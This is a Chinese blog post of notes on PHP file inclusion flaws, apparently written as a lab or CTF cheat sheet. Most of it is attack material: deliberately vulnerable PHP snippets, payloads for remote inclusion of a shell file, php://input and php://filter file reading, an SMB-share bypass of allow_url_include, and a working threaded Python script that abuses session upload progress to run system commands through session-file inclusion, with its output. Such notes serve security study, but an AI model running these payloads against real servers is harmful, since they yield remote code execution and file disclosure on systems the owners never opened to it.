关于文件包含

文件包含

相关基础

# 示例源码
<?php include($_GET['pages']); ?>

# 相关函数
include()
require()
include_once()
require_once()

# 利用
    远程代码执行
        /?file=[http|https|ftp]://example.com/shell.txt
        需要 allow_url_fopen=On
    利用php流input代码执行
        /?file=php://input
    利用php流filter读取任意文件
        /?file=php://filter/convert.base64-encode/resource=index.php
    利用data URIs
        /?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    利用XSS执行任意代码
        /?file=http://127.0.0.1/path/xss.php?xss=phpcode
        需要 allow_url_fopen=On

利用SMB绕过 allow_url_include ,allow_url_fopen

# 漏洞文件
<?php
highlight_file(__FILE__);
$a=$_GET['file'];
include($a);
?> 

# allow_url_include ,allow_url_fopen 都为off时可实现绕过

# 配置
smbserver.py -debug -smb2support -comment "shivers" shivers /root/Desktop/tmp

# 访问
http://localhost/lfi.php?file=\\192.168.253.128\shivers\include\shell.php

https://xz.aliyun.com/t/5139

包含session文件实现getshell

# 前提
phpinfo.php 
'''
| session.save_path | /var/lib/php/sessions | # session文件保存路径
...
| session.use_strict_mode | 0    | # 为 0 表示对Cookie中sessionid可控
'''

# 漏洞文件
include.php:
 <?php
    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    $fielf=$_POST["field"];
    $cf="/tmp/".$_POST['cf'];
    
    if(file_exists($cf)){
        include $cf;
        echo $$field;
        exit;
    }
    else{
        echo "";
        exit;
    }
?> your flag is in some file in /etc

# 脚本

#coding=utf-8
import io
import requests
import threading
sessid = 'shivers'
data = {
    "cf": "../../../../var/lib/php/sessions/sess_" + sessid
    }

def write(session):
    for _ in range(10):
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://192.168.253.128/include.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '''isTAG<?php system("id")?>'''}, files={'file': ('shivers.txt',f)}, cookies={'PHPSESSID': sessid} )

def read(session):
    for _ in range(10):
        resp = session.post('http://192.168.253.128/include.php', data=data)

        if 'TAG' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
            
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,10): 
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,10):
            threading.Thread(target=read,args=(session,)).start()
    event.set()


# 产生的session文件格式
'''
upload_progress_isTAGuid=33(www-data) gid=33(www-data) groups=33(www-data)
|a:5:{s:10:"start_time";i:1621313921;s:14:"content_length";i:51480;s:15:"bytes_processed";i:5251;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:11:"shivers.txt";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1621313921;s:15:"bytes_processed";i:5251;}}}
'''

https://www.freebuf.com/vuls/202819.html

利用PHP自包含getshell

https://www.anquanke.com/post/id/153376#h2-7

posted @ 2021-05-04 10:27  Shivers0x72  阅读(50)  评论(0编辑  收藏  举报